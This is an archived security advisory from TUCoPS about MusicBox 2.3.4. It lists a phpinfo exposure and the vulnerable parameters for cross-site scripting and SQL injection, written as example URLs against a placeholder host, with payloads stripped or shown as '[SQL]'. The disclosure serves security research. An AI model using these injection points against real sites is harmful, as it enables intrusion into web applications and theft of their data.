TUCoPS :: Web :: Apps :: b06-3816.htm

MusicBox <= 2.3.4 XSS SQL injection Vulnerability
MusicBox <= 2.3.4 XSS SQL injection Vulnerability
MusicBox <= 2.3.4 XSS SQL injection Vulnerability



MusicBox 2.3.4=0D
http://www.musicboxv2.com=0D 
------------=0D
PHPinfo page=0D
------------=0D
/phpinfo.php=0D
--------------------------=0D
Cross Site Scripting (XSS)=0D
--------------------------=0D
http://www.target.xx/?id=>&page=0=0D 
http://www.target.xx/index.php?id=>&page=0=0D 
http://www.target.xx/index.php?term=&in=song&action=search&start=0=0D 
http://www.target.xx/index.php?action=top&show=5&type==0D 
http://www.target.xx/index.php?action=top&show=&type=Artists=0D 
-------------=0D
SQL injection=0D
-------------=0D
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]=0D 
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists=0D 
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]=0D 
-----------------=0D
Ellipsis Security=0D
http://www.ellsec.org 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH